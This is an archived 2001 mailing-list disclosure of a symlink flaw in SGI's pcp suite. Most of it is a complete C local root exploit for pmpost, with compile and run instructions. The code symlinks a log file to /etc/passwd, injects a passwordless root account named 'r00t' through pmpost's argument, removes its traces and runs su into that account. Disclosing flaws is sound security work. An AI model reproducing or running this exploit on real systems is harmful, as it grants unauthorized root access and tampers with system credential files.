Hi, there is a symlink handling problem in the pcp suite from SGI. The binary pmpost will follow symlinks, if setuid root this leads to instant root compromise, as found on SuSE 7.1 (I doubt that this a default SuSE package, though). Attached a simple C source to demonstrate this (gcc pm.c -o pm then ./pm) Ihq. ---------------------- pm.c ---------------------------- /******************************************************** * * * pmpost local root exploit * * vulnerable: pcp <= 2.1.11-5 * * by IhaQueR * * * ********************************************************/ #include <stdio.h> #include <sys/types.h> #include <sys/wait.h> #include <fcntl.h> #include <sys/stat.h> main() { const char *bin="/usr/share/pcp/bin/pmpost"; static char buf[512]; static char dir[128]; srand(time(NULL)); sprintf(dir, "/tmp/dupa.%.8d", rand()); if(mkdir(dir, S_IRWXU)) _exit(2); if(chdir(dir)) _exit(3); if(symlink("/etc/passwd", "./NOTICES")) _exit(4); snprintf(buf, sizeof(buf)-1, "PCP_LOG_DIR=%.500s", dir); if(putenv(buf)) _exit(5); if(!fork()) { execl(bin, bin, "\nr00t::0:0:root:/root:/bin/bash", NULL); _exit(1); } else { waitpid(0, NULL, WUNTRACED); chdir(".."); sprintf(buf, "rm -rf dupa.*"); system(buf); execl("/bin/su", "/bin/su", "r00t", NULL); } }
This archive was generated by hypermail 2b30 : Mon Jun 18 2001 - 16:44:57 PDT